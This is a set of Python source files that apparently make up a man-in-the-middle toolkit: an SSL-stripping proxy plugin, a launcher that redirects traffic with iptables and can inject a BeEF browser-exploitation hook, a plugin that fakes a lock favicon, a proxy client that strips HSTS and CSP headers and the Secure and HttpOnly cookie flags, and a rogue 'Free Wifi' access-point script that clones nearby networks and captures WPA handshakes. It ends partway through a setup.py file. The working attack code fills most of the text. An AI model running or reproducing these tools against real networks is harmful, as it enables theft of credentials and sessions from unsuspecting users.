""" converts https links to http but when followed proxies via SSL """

from tools.logs import log

from urlparse import urlparse

# callbacks
from tools.pydispatch2 import on
from mim.proxyserver import gotRequest
from mim.proxyclient import gotResponseTree, gotResponseText

# urls converted https to http
SSL = set()

@on(gotRequest)
def proxyViaSSL(sender):
    if isSSL(sender.uri):
        log.debug("%s Request sent by proxy via SSL %s"%(sender.id, sender.uri))
        sender.scheme = "https"

@on(gotResponseTree)
def strip(sender, tree):
    """ replace ssl links with http """
    # works with lxml.html
    tree.rewrite_links(removeHTTPS)
    
    # works with lxml.etree
    """for elem in tree.xpath("//a"):
        try:
            elem.attrib["href"] = removeHTTPS(elem.attrib["href"])
        except:
            pass
    """
@on(gotResponseText)
def stripText(sender):
    """ replace https not in links/style tags e.g. in script tags
        NOTE this may prevent some scripts from running correctly
    """
    # note do not change location header as causes redirect loops

    # remove from text
    text = sender.data
    startlink = text.find("https://", 0)
    while startlink >= 0:
        endlink = text.find(" ", startlink + 1)
        link = text[startlink : endlink]
        link = removeHTTPS(link)
        text = text[0:startlink] + link + text[endlink:]
        startlink = text.find("https://", endlink)
    sender.data = text

def isSSL(uri):
    """ test if link was SSL converted to http """
    for elem in SSL:
        if uri.startswith(elem):
            return True
    return False

def removeHTTPS(link):
    """ converts ssl link to http """

    # note links are case sensitive!
    try:
        parsed = urlparse(link)
    except:
        # sometimes no space at end of links in scripts
        # could parse with regex to avoid these errors
        return link
    if parsed.scheme.lower() == "https":
        link = "http://"+link[8:]
        SSL.add(link)
    return link


#!/usr/bin/env python

""" starts proxyserver to listen for requests
    and attaches plugins to read and manipulate

    usage: proxy.py [options]

    optional arguments:
      -h, --help         Show this help message and exit
      -l, --loglevel=X   logging level [default: 10]

      -a, --auth         Log userids/passwords
      -b, --beef         Inject beef hook (browser exploitation framework)
      -c, --cats         Replace images with cats
      -f, --favicon      Send lock favicon
      -i, --inject       Inject data/injection.html
      -k, --kill         Kill session on first visit to domain
      -r, --logrequests  Log requests
      -s, --sslstrip     Replace https with http then proxy links via https
      -u, --upsidedown   Show images upsidedown
"""
from tools.logs import log, logfile
from docopt import docopt

from mim.proxyserver import ProxyFactory
from twisted.internet import reactor
import os

from tools import fileserver
from tools.tools import su, setTitle, fwreset
from tools.bash import ifconfig
from subprocess import call
from version import __version__


PROXYPORT = 10000
BEEFPORT = 3000
FILESERVER = ifconfig().wlanip
FILEPORT = 8000

def main():
    """ run proxy server and setup callbacks """
    
    # setup logging
    with open(logfile, 'w'):
        pass
    args = docopt(__doc__, version=__version__)
    log.info(args)
    log.setLevel(int(args["--loglevel"]))

    # connect plugins
    from plugins import otherplugins
    otherplugins.init(args, BEEFPORT, FILESERVER, FILEPORT)
    # get files in plugins pluginfolder
    pluginfolder = os.path.dirname(otherplugins.__file__)
    for module in os.listdir(pluginfolder):
        if module in ('__init__.py', 'otherplugins.py') or not module.endswith('.py'):
            continue
        module = module[:-3]
        if args["--%s"%module]:
            __import__("plugins.%s"%module)

    # create firewall gateway and route port 80 to proxy
    fwreset()
    su("sysctl net.ipv4.ip_forward=1")
    su("iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port %s"%PROXYPORT)
    su("iptables -t nat -A POSTROUTING -j MASQUERADE")
    log.info("iptables redirecting port 80==>%s"%PROXYPORT)

    # start servers
    if args["--cats"] or args["--inject"]:
        reactor.listenTCP(FILEPORT, fileserver.Site( \
                fileserver.Data(pluginfolder+"/data")))
        log.info("starting file server on %s:%s" %(FILESERVER, FILEPORT))

    if args["--beef"]:
        os.chdir("/usr/share/beef-xss")
        call(['sudo', './beef'])
        log.info("starting beef server on %s" %BEEFPORT)

    reactor.listenTCP(PROXYPORT, ProxyFactory())
    log.info("starting proxy server on port %s"%PROXYPORT)
    reactor.run()
    
    fwreset()

if __name__ == '__main__':
    setTitle(__file__)
    main()


""" replace favicon with lock icon """
from tools.logs import log

import os
import lxml

# callbacks
from tools.pydispatch2 import on
from mim.proxyserver import gotRequest
from mim.proxyclient import gotResponseTree

# lockicon to use as favicon.
with open("%s/../data/lock.ico"%os.getcwd()) as f:
    lockicon = f.read()

@on(gotResponseTree)
def removeFavicon(sender, tree):
    """ replace link with standard name so this can be identified on request """

    # remove favicon
    elems = tree.xpath('//link[@rel="icon" or @rel="shortcut icon"]')
    for elem in elems:
        log.debug("%s Replacing favicon"%sender.father.id)
        p = elem.getparent()
        p.remove(elem)

    # insert replacement favicon
    try:
        head = tree.xpath("//head")[0]
    except:
        head = lxml.html.fromstring("<head></head>")
        tree.insert(0, head)
    elem = lxml.etree.fromstring('<link rel="icon" href="/favicon.ico"/>')
    head.append(elem)

@on(gotRequest)
def sendLockFavicon(sender):
    """ replace favicon with lock file on older browsers """
    if not sender.path.endswith("favicon.ico"):
        return
    log.debug("{id} Sending lock favicon for {host}".format(id=sender.id, host=sender.host))
    sender.setResponseCode(200, "OK")
    sender.setHeader("Content-Type", "image/x-icon")
    sender.write(lockicon)
    sender.finish()


#!/usr/bin/env python

import os
from subprocess import Popen, PIPE
import time
import sys
import re
import signal
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
from threading import Thread, Lock
import socket
import struct
import fcntl

# Console colors
W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
B  = '\033[34m' # blue
P  = '\033[35m' # purple
C  = '\033[36m' # cyan
GR = '\033[37m' # gray
T  = '\033[93m' # tan

lock = Lock()
DN = open(os.devnull, 'w')
APs = {} # for listing APs
chan = 0 # for channel hopping Thread
count = 0 # for channel hopping Thread
forw = '0\n' # for resetting ip forwarding to original state
ap_mac = '' # for sniff's cb function
err = None # check if channel hopping is working

def parse_args():
    #Create the arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--channel", help="Choose the channel for the fake AP. Default is channel 6")
    parser.add_argument("-w", "--wpa", help="Start the fake AP with WPA beacon tags and capture handshakes in fakeAPlog.cap file", action="store_true")
    parser.add_argument("-e", "--essid", help="Choose the ESSID for the fake AP. Default is 'Free Wifi'. Wrap in quotes if it is more than 1 word: -e 'Free Wifi'")
    parser.add_argument("-t", "--targeting", help="Will print a list of APs in range and allow you to copy their settings except for the encryption which by default will be open", action="store_true")
    return parser.parse_args()


###############
# AP TARGETING
###############

def channel_hop(mon_iface):
    global chan, err
    while 1:
        try:
            err = None
            if chan > 11:
                chan = 0
            chan = chan+1
            channel = str(chan)
            iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE)
            for line in iw.communicate()[1].split('\n'):
                if len(line) > 2: # iw dev shouldnt display output unless there's an error
                    with lock:
                        err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n    \
Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n    \
from the network if you have not already\n'
                    break
            time.sleep(1)
        except KeyboardInterrupt:
            sys.exit()

def target_APs():
    os.system('clear')
    if err:
        print err
    print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below'
    print 'num  ch   ESSID'
    print '---------------'
    for ap in APs:
        print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W

def copy_AP():
    copy = None
    while not copy:
        try:
            copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ')
            copy = int(copy)
        except Exception:
            copy = None
            continue
    channel = APs[copy][0]
    essid = APs[copy][1]
    if str(essid) == "\x00":
        essid = ' '
    mac = APs[copy][2]
    return channel, essid, mac

def targeting_cb(pkt):
    global APs, count
    if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
        try:
            ap_channel = str(ord(pkt[Dot11Elt:3].info))
        except Exception:
            return
        essid = pkt[Dot11Elt].info
        mac = pkt[Dot11].addr2
        if len(APs) > 0:
            for num in APs:
                if essid in APs[num][1]:
                    return
        count += 1
        APs[count] = [ap_channel, essid, mac]
        target_APs()

###################
# END AP TARGETING
###################
def get_isc_dhcp_server():
    if not os.path.isfile('/usr/sbin/dhcpd'):
        install = raw_input('['+T+'*'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd, install now? [y/n] ')
        if install == 'y':
            os.system('apt-get -y install isc-dhcp-server')
        else:
            sys.exit('['+R+'-'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd')

def iwconfig():
    monitors = []
    interfaces = {}
    proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue # Isn't an empty string
        if line[0] != ' ': # Doesn't start with space
            #ignore_iface = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]|at[0-9]', line)
            #if not ignore_iface: # Isn't wired or at0 tunnel
            iface = line[:line.find(' ')] # is the interface name
            if 'Mode:Monitor' in line:
                monitors.append(iface)
            elif 'IEEE 802.11' in line:
                if "ESSID:\"" in line:
                    interfaces[iface] = 1
                else:
                    interfaces[iface] = 0
    return monitors, interfaces

def rm_mon():
    monitors, interfaces = iwconfig()
    for m in monitors:
        if 'mon' in m:
            Popen(['airmon-ng', 'stop', m], stdout=DN, stderr=DN)
        else:
            Popen(['ifconfig', m, 'down'], stdout=DN, stderr=DN)
            Popen(['iw', 'dev', m, 'mode', 'managed'], stdout=DN, stderr=DN)
            Popen(['ifconfig', m, 'up'], stdout=DN, stderr=DN)

def internet_info(interfaces):
    '''return the internet connected iface'''
    inet_iface = None
    proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
    def_route = proc.communicate()[0].split('\n')#[0].split()
    for line in def_route:
        if 'default via' in line:
            line = line.split()
            inet_iface = line[4]
            ipprefix = line[2][:2] # Just checking if it's 192, 172, or 10
    if inet_iface:
        return inet_iface, ipprefix
    else:
        #cont = False
        #while not cont:
        #    cont = raw_input('['+R+'-'+W+'] No active internet connection found. AP will be without internet. Hit [c] to continue: ')
        sys.exit('['+R+'-'+W+'] No active internet connection found. Exiting')

def AP_iface(interfaces, inet_iface):
    for i in interfaces:
        if i != inet_iface:
            return i

def iptables(inet_iface):
    global forw
    os.system('iptables -X')
    os.system('iptables -F')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    os.system('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE' % inet_iface)
    with open('/proc/sys/net/ipv4/ip_forward', 'r+') as ipf:
        forw = ipf.read()
        ipf.write('1\n')
        return forw

def start_monitor(ap_iface, channel):
    proc = Popen(['airmon-ng', 'start', ap_iface, channel], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if "monitor mode enabled" in line:
            line = line.split()
            mon_iface = line[4][:-1]
            return mon_iface

def get_mon_mac(mon_iface):
    '''http://stackoverflow.com/questions/159137/getting-mac-address'''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    return mac

def start_ap(mon_iface, channel, essid, args):
    print '['+T+'*'+W+'] Starting the fake access point...'
    if args.wpa:
        Popen(['airbase-ng', '-P', '-Z', '4', '-W', '1', '-c', channel, '-e', essid, '-v', mon_iface, '-F', 'fakeAPlog'], stdout=DN, stderr=DN)
    else:
        Popen(['airbase-ng', '-c', channel, '-e', essid, '-v', mon_iface], stdout=DN, stderr=DN)
    try:
        time.sleep(6) # Copied from Pwnstar which said it was necessary?
    except KeyboardInterrupt:
        cleanup(None, None)
    Popen(['ifconfig', 'at0', 'up', '10.0.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
    Popen(['ifconfig', 'at0', 'mtu', '1400'], stdout=DN, stderr=DN)

def sniffing(interface, cb):
    '''This exists for if/when I get deauth working
    so that it's easy to call sniff() in a thread'''
    sniff(iface=interface, prn=cb, store=0)

def dhcp_conf(ipprefix):
    config = ('default-lease-time 300;\n'
              'max-lease-time 360;\n'
              'ddns-update-style none;\n'
              'authoritative;\n'
              'log-facility local7;\n'
              'subnet %s netmask 255.255.255.0 {\n'
              'range %s;\n'
              'option routers %s;\n'
              'option domain-name-servers %s;\n'
              '}')
    if ipprefix == '19' or ipprefix == '17':
        with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
            # subnet, range, router, dns
            dhcpconf.write(config % ('10.0.0.0', '10.0.0.2 10.0.0.100', '10.0.0.1', '8.8.8.8'))
    elif ipprefix == '10':
        with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
            dhcpconf.write(config % ('172.16.0.0', '172.16.0.2 172.16.0.100', '172.16.0.1', '8.8.8.8'))
    return '/tmp/dhcpd.conf'

def dhcp(dhcpconf, ipprefix):
    os.system('echo > /var/lib/dhcp/dhcpd.leases')
    dhcp = Popen(['dhcpd', '-cf', dhcpconf], stdout=PIPE, stderr=DN)
    if ipprefix == '19' or ipprefix == '17':
        os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
    else:
        os.system('route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.0.1')

def mon_mac(mon_iface):
    '''
    http://stackoverflow.com/questions/159137/getting-mac-address
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    return mac

def cleanup(signal, frame):
    with open('/proc/sys/net/ipv4/ip_forward', 'r+') as forward:
        forward.write(forw)
    os.system('iptables -F')
    os.system('iptables -X')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    os.system('pkill airbase-ng')
    os.system('pkill dhcpd') # Dangerous?
    rm_mon()
    sys.exit('\n['+G+'+'+W+'] Cleaned up')

def main(args):
    global ipf, mon_iface, ap_mac

    if os.geteuid() != 0:
        sys.exit('['+R+'-'+W+'] Run as root')

    get_isc_dhcp_server()

    channel = '1'
    if args.channel:
        channel = args.channel
    essid = 'Free Wifi'
    if args.essid:
        essid = args.essid

    monitors, interfaces = iwconfig()
    rm_mon()
    inet_iface, ipprefix = internet_info(interfaces)
    ap_iface = AP_iface(interfaces, inet_iface)
    if not ap_iface:
        sys.exit('['+R+'-'+W+'] Found internet connected interface in '+T+inet_iface+W+'. Please bring up a wireless interface to use as the fake access point.')
    ipf = iptables(inet_iface)
    print '['+T+'*'+W+'] Cleared leases, started DHCP, set up iptables'
    mon_iface = start_monitor(ap_iface, channel)
    mon_mac1 = get_mon_mac(mon_iface)
    if args.targeting:
        hop = Thread(target=channel_hop, args=(mon_iface,))
        hop.daemon = True
        hop.start()
        sniffing(mon_iface, targeting_cb)
        channel, essid, ap_mac = copy_AP()
    start_ap(mon_iface, channel, essid, args)
    dhcpconf = dhcp_conf(ipprefix)
    dhcp(dhcpconf, ipprefix)
    while 1:
        signal.signal(signal.SIGINT, cleanup)
        os.system('clear')
        print '['+T+'*'+W+'] '+T+essid+W+' set up on channel '+T+channel+W+' via '+T+mon_iface+W+' on '+T+ap_iface+W
        print '\nDHCP leases log file:'
        proc = Popen(['cat', '/var/lib/dhcp/dhcpd.leases'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            print line
        time.sleep(1)

main(parse_args())



""" log all requests """
from tools.logs import log

# callbacks
from tools.pydispatch2 import on
from mim.proxyserver import gotRequest
from mim.proxyclient import gotResponseTree

loaded = set()
visited = set()

log.info("loaded logreqiesstsf")

@on(gotResponseTree)
def storeLoaded(sender, tree):
    """ store image and script links so they are not logged """
    for item in tree.xpath("//img|//script|iframe"):
        try:
            loaded.add(item.attrib["src"])
        except:
            pass
    for item in tree.xpath("//link"):
        try:
            loaded.add(item.attrib["href"])
        except:
            pass

@on(gotRequest)
def logRequest(sender):
    """ log requests """
    if sender.host in loaded or sender.domain in visited:
        return

    visited.add(sender.domain)
    excluded = ['jpg', 'jpeg', 'js', 'json', 'gif', 'png', 'css', 'ico', 'js', 'svg', 'ttf', 'woff']
    extension = sender.path.split(".")[-1].lower()
    if extension in excluded:
        return

    log.info("requested: %s %s"%(sender.id, sender.host))


""" extensions to pydispatch 

    connects signals to callback functions (publish/subscribe model)
"""

from logs import log
from pydispatch.dispatcher import connect, send, disconnect, Any
DEBUG=False

def on(signal=Any, sender=Any, weak=False):
    """ decorator that connects a function to a signal event
        e.g. @on(signalFired)
        note weak=False keeps callback functions alive
        weak references would mean callbacks are garbage collected
    """
    def inner(receiver):
        signal.connect(receiver, sender=sender, weak=weak)
        return receiver
    return inner

class Signal(object):
    """ Defines signal object for use with pydispatch. Adds logging.
    """
    def __init__(self, name=None):
        self.name=name    

    def __repr__(self):
        return unicode(self)

    def __unicode__(self):
        return self.name or u'UNNAMED {0}'.format(hash(self))

    def connect(self, receiver, sender=Any, weak=False):
        """ connect signal to receiver """
        if DEBUG:
            log.debug('Connect {receiver.__module__}.{receiver.__name__} to {self}'.format(**locals()))
        connect(receiver, signal=self, sender=sender, weak=weak)

    def send(self, sender="No sender", *args, **kwargs):
        """ send signal """
        if DEBUG:
            log.debug('Send {self} from {sender}'.format(**locals()))
        send(signal=self, sender=sender, *args, **kwargs)

    def disconnect(receiver, sender=Any, weak=False):
        """ Disconnect receiver from signal """
        if DEBUG:
            log.debug('Disconnect {receiver} from {self}'.format(**locals()))
        disconnect(receiver, signal=self, sender=sender, weak=weak)



""" miscellaneous tools """    

from logs import log
import os
from subprocess import call
import shlex
import zlib

devnull = open(os.devnull, 'w')
def su(cmd):
    """ sudo cmd with stdout=devnull """
    call(shlex.split("sudo %s"%cmd), stdout=devnull)

def setTitle(title):
    """ set title on linux terminal window """
    os.system('echo "\033]0;%s\007"'%title)

class zips(object):
    """ compress/decompress using zlib, gzip, deflate 
        e.g. zips("zlib").compress(text)
             zips("zlib").decompress(text)
    """
    methods = dict(deflate = -zlib.MAX_WBITS,
                   zlib = zlib.MAX_WBITS,
                   gzip = zlib.MAX_WBITS | 16)
    
    def __init__(self, method):
        self.method = method
        self.obj = zlib.compressobj(9, zlib.DEFLATED, self.methods[method]) 

    def compress(self, text):
        return self.obj.compress(text) + self.obj.flush()

    def decompress(self, text):
        return zlib.decompress(text, self.methods[self.method])

def fwreset():
    """ reset firewall settings """
    su("sysctl net.ipv4.ip_forward=0")

    # reset defaults for filter, nat and mangle
    su("iptables -P INPUT ACCEPT")
    su("iptables -P FORWARD ACCEPT")
    su("iptables -P OUTPUT ACCEPT")
    su("iptables -t nat -P PREROUTING ACCEPT")
    su("iptables -t nat -P POSTROUTING ACCEPT")
    su("iptables -t nat -P OUTPUT ACCEPT")
    su("iptables -t mangle -P PREROUTING ACCEPT")
    su("iptables -t mangle -P OUTPUT ACCEPT")

    # flush rules
    su("iptables -F")
    su("iptables -t nat -F")
    su("iptables -t mangle -F")

    # erase chains
    su("iptables -X")
    su("iptables -t nat -X")
    su("iptables -t mangle -X")

    # set new rules
    su("iptables -A INPUT -i lo -j ACCEPT")

    log.info("iptables has been reset")


""" wrapper for bash commands that parses their output into vars
    e.g. route() => {'iface': 'wlan0', 'router': '192.168.0.1'}
"""
from subprocess import call, check_output, STDOUT
import shlex
import socket

class bash(object):
    """ abstract base for each command """
    
    def __init__(self, *args):
        """ calls bash command and feeds each output line to parse method """
        
        # initialise
        self.startparse()

        # if just one arg then split string into a list
        if len(args) == 1:
            args = shlex.split(args[0])
        
        # execute and parse lines
        cmd = ["sudo", type(self).__name__]+list(args)
        #log.debug("bash=>%s"%' '.join(cmd))
        self._data = check_output(cmd, stderr=STDOUT)
        for line in self._data.splitlines():
            self.parse(line.decode())
        
    def __repr__(self):
        """ shows variables returned """
        out = {var : getattr(self,var) for var in vars(self) if not var.startswith("_")}
        return str(out)
  
    def startparse(self):
        """ initialise output variables """
        pass

    def parse(self, line):
        """ parse each line of output """
        pass

class ifconfig(bash):
    def startparse(self):
        self.localhost = None
        self.wlanip = None
        self.wlanmac = None

    def parse(self, line):
        if line and not line.startswith(" "):
            self._iface = line.split()[0]
        
        if self._iface == "lo":
            if line.strip().startswith("inet addr"):
                self.localhost = line.split()[1].split(":")[1]
        
        elif self._iface.startswith("wlan"):
            if line.startswith("wlan"):
                self.wlanmac = line.split()[4]
            if line.strip().startswith("inet addr"):
                self.wlanip = line.split()[1].split(":")[1]

class iwconfig(bash):
    def startparse(self):
        # interface is key to dict with attributes essid, monitor
        self.interfaces = dict()

    def parse(self, line):
        if len(line) == 0:
            return
        if line[0] != ' ':
            self._iface = line[:line.find(' ')]
            self.interfaces[self._iface] = dict()
            if 'IEEE 802.11' in line:
                if "ESSID:\"" in line:
                    self.interfaces[self._iface]["essid"] = line.split(":")[-1]
            return
        if 'Mode:Monitor' in line:
            self.interfaces[self._iface]["monitor"]=True
 
class route(bash):
    def startparse(self):
        self.iface = None
        self.router = None

    def parse(self, line):
        line = line.split()
        if line[0] == 'default' or line[0] == "0.0.0.0":
            self.iface = line[-1]
            self.router = line[1]

class arp(bash):
    def startparse(self):
        # ip is key
        self.mac = dict()

    def parse(self, line):
        line=line.split()
        self.mac[line[0]]= line[2]

class nmap(bash):
    def startparse(self):
        # ip is key
        self.mac = dict()
        self.hw = dict()
        self.ip = set()
    
    def parse(self, line):
        if line.startswith('Nmap'):
            self._ip = line.split()[-1]
            try:
                socket.inet_aton(self._ip)
                self.ip.add(self._ip)
            except socket.error:
                pass
        if line.startswith('MAC'):
            line = line.split()
            self.mac[self._ip] = line[2]
            self.hw[self._ip] = line[3].replace("(","").replace(")","")

class nbtscan(bash):
    def startparse(self):
        # dict with ip = windows netbios name
        self.netbios = dict()
    
    def parse(self, line):
        line = line.split()
        try:
            # test if valid ip address
            socket.inet_aton(line[0])
            self.netbios[line[0]] = line[1]
        except (socket.error, IndexError):
            pass



#!/usr/bin/python

""" simple file server using twisted 

    run from command prompt on port 8000
    or reactor.listenTCP(FILEPORT, fileserver.Site(fileserver.Data()))
"""

from twisted.web.server import Site
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.python.filepath import FilePath
from logs import log
import mimetypes
from tools import zips, setTitle
import os

class Data(Resource):
    isLeaf = True

    def __init__(self, datafolder):
        self.data = FilePath(datafolder)

    def render_GET(self, request):
        # check directory traversal. replace child with preauthChild to allow subfolders
        try:
            path = self.data.child(request.path.lstrip("/"))
        except:
            log.warning("Directory traversal attempt %s"%request.path)
            request.setResponseCode(404)
            return "File not found %s"%request.path
    
        # get content
        try:
            with path.open('rb') as f:
                content = f.read()
        except:
            log.warning("File not found %s"%path)
            request.setResponseCode(404)
            return "File not found %s"%path
        
        # set headers
        request.setResponseCode(200)
        if "Accept-Encoding" in request.headers:
            # check codings that are both accepted and which we can apply
            oldcodes = request.headers["Accept-Encoding"].split(",") or []
            newcodes = [code for code in oldcodes if code in zips.methods]
            if len(newcodes) > 0:
                code = newcodes[0]
                request.setHeader('content-encoding', code)
                content=zips(code).compress(content)
        request.setHeader('Content-type', mimetypes.guess_type(path.path)[0])
        request.setHeader('Content-length', len(content))
        request.setHeader('Cache-Control',  'max-age=604800, public')

        return content

if __name__ == '__main__':
    setTitle(__file__)

    port=8000
    reactor.listenTCP(port, Site(Data(os.getcwd()+"/data")))
    log.info("Serving on %s."%port)
    reactor.run()


""" handles response from server and fires signals for subscriber plugins
"""

from tools.logs import log

from twisted.web import proxy, http
from twisted.protocols.policies import TimeoutMixin
from lxml.html import fromstring, tostring, HTMLParser
from tools.tools import zips

from tools.pydispatch2 import Signal

gotResponseTree = Signal("gotResponseTree")
gotResponseText = Signal("gotResponseText")
gotResponseImage = Signal("gotResponseImage")

class ProxyClient(proxy.ProxyClient, TimeoutMixin):
    """ sends request to server and processes response """ 
    
    def __init__(self, command, rest, version, headers, data, father):
        proxy.ProxyClient.__init__(self, command, rest, version, headers, data, father)
        
        # response header info
        self.contentlength = None
        self.isHTML = False
        self.imagetype = None

        self.finished = False
        self.setTimeout(30)
        d = father.notifyFinish()
        d.addBoth(self.onRequestFinished)

    def connectionMade(self):
        # sometimes request disconnects BEFORE notifyFinish() has been trapped
        # could not find a way to detect this without referring to _disconnected
        if self.father._disconnected:
            log.debug("{id} Request disconnected before proxy client initialised" \
                                .format(id=self.father.id))
            self.finish()
            return

        # send request to web server
        proxy.ProxyClient.connectionMade(self)

    def onRequestFinished(self, message=None):
        """ callback from request.notifyFinish() """
        if message:
            log.debug("{id} Request finished with error\n{message}"\
                            .format(id=self.father.id, message=message))
        self.finish()

    def timeoutConnection(self):
        log.debug("%s Timed out"%self.father.id)
        TimeoutMixin.timeoutConnection(self)
    
    def finish(self):
        """ close server and client. can be called multiple times """
        if not self.father.finished and not self.father._disconnected:
            self.father.finish()

        if not self.finished:
            self.transport.loseConnection()
            self.setTimeout(None)
            self.finished = True

    ################ response ##############################################

    def handleHeader(self, key, value):
        """ manipulate and/or save response headers """
        if key.lower() == 'content-length':
            self.contentlength = value
        elif key.lower() in ("content-security-policy", "x-frame-options", \
                            "x-content-type-options", "strict-transport-security"):
            return
        elif key.lower() == 'set-cookie':
            # remove secure and httponly flags
            # NOTE have to parse cookies manually as Cookie library does not parse secure bit
            elems = value.split(";")
            value = ";".join([elem for elem in elems \
                             if elem.lstrip().rstrip().lower() \
                             not in ("secure", "httponly")])
        elif key.lower() == 'content-type':
            if value.find('image/') >= 0:
                self.imagetype = value.split("image/")[-1]
            elif value.find('html') >= 0:
                self.isHTML = True

        proxy.ProxyClient.handleHeader(self, key, value)
    
    def handleEndHeaders(self):
        # default waits for response forever e.g. on cached images
        if self.father.code in http.NO_BODY_CODES:
            self.finish()

    def handleResponsePart(self, content):
        if self.isHTML or self.imagetype:
            # buffer for processing in handleResponse
            http.HTTPClient.handleResponsePart(self, content)
        else:
            # write immediately
            proxy.ProxyClient.handleResponsePart(self, content)

    def handleResponseEnd(self):
        # call HTTPClient version which calls handleResponse
        # note ProxyClient assumes all written to client and closes the connection
        http.HTTPClient.handleResponseEnd(self)
    
    def handleResponse(self, content):
        try:
            # log response after handleHeader but before other changes
            log.debug("{id} RESPONSE {pathquery}\n{response}" \
                .format(id=self.father.id, pathquery=self.father.pathquery, \
                                    response=self.father.getResponse()))

            # make member variable to allow subscribers to change
            self.data = content

            # response with no body or already written in handleResponsePart e.g. js, css
            if not self.data:
                self.finish()
                return

            # process images
            if self.imagetype:
                gotResponseImage.send(sender=self)

            # process HTML from successful requests. Ignore HTML from 404 not found etc..
            elif self.isHTML and self.father.code == 200:
                self.processHTML()

            # if response used contentlength then update for new length
            # if no length header then twisted will use chunking
            if self.contentlength:
                self.father.setHeader('Content-Length', len(self.data))
            self.father.write(self.data)
            self.finish()
        except:
            log.exception("{id} Unhandled error in handleResponse\nuri={uri}\n".format \
                                (id=self.father.id, uri=self.father.uri))
    
    ########################################################################################################################

    def processHTML(self):
        """ decodes data; calls callbacks; recodes data """
        zipencoding = None
        try:
            zipencoding = self.father.responseHeaders.getRawHeaders("Content-Encoding")[-1]
            self.data = zips(zipencoding).decompress(self.data)
        except:
            zipencoding = None

        if len(self.data) > 1 \
            and not self.data == "<!-- default response -->":
            # use encoding header if available. default is meta tag but not always present.
            # assumes unicode. could enforce with unicodedammit but very slow and never found necessary
            try:
                encoding = self.father.responseHeaders.getRawHeaders \
                                ("content-type")[-1].split('charset=')[1].split(";")[0]
            except:
                encoding = "ISO-8859-1"
            try:
                tree = fromstring(self.data, parser=HTMLParser(encoding=encoding))
                gotResponseTree.send(sender=self, tree=tree)
                self.data = tostring(tree, encoding=encoding)
            except:
                log.exception("{id} Content not parseable len={len} enc={enc}\n{data}"\
                    .format(id=self.father.id, len=len(self.data), enc=encoding, data=self.data[:100]))
         
        # gotResponseTree used by most plugins but but sometimes may want to see raw text
        gotResponseText.send(sender=self)

        if zipencoding:
            self.data = zips(zipencoding).compress(self.data)

class ProxyClientFactory(proxy.ProxyClientFactory):
    protocol = ProxyClient


#!/usr/bin/env python

"""
simple setup.py with common defaults

Configuration (all optional):
    root folder name => name and description
    requirements.txt => list of dependencies to be installed
    README.*         => first found is long_description
    LICENSE.txt      => license
    version.py       => contains __version__
    .gitignore       => files to exclude from git and installation
    everything in the scripts folder is treated as a script
    setup.cfg        => [metadata] section. adds further data and overrides the above
                        [setup] section. autoinc = 0,1,2 increments major/minor/micro version

To publish to pypi and github:
    git commit -a -m "message" push
    setup.py register sdist upload => register metadata; tar source; upload to pypi
"""
import ConfigParser
from tools.logs import log
from setuptools import setup, find_packages
import pkg_resources
from subprocess import check_output
import os
import sys

here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)

try:
    from version import __version__
except:
    __version__ = "0.0.0"
    with open("version.py", "w") as f:
        f.write("__version__='%s'"%__version__)

def main():
    log.info("***** running setup.py with args=%s *****"%sys.argv)
    setupdict = defaultSetup()
    if sys.argv[1] == "sdist":
        setupdict.update(cfgSetup())
    logsetup(setupdict)    
    setup(**setupdict)

def defaultSetup():
    """ returns default dict """
    name = here.split("/")[-1]
    setupdict=dict(
    	# basic settings to create sdist tar with files under version control
        name = name,
        description = name,
        setup_requires = ["setuptools_git >= 0.3"],
        version      = __version__,
        long_description = long_description(),
        install_requires = install_requires(),
        dependency_links = dependency_links(),
        
        # additional settings for pip install
        packages     = find_packages(),
        include_package_data = True,
        scripts = scripts(),
        data_files = ['', data_files()]
    )
    return setupdict

def cfgSetup():
    """ process setup.cfg and return dict """
    
    # get setup.cfg
    c = ConfigParser.ConfigParser(allow_no_value=True)
    try:
        c.readfp(open("setup.cfg"))
    except:
        return dict()
    
    # get metadata section
    try:
        cfg = dict(c.items("metadata"))
        cfg["classifiers"] = cfg["classifiers"].splitlines()
    except:
        cfg = dict()
    
    # autoincrement version
    try:
        inc = int(c.get("setup", "autoinc"))
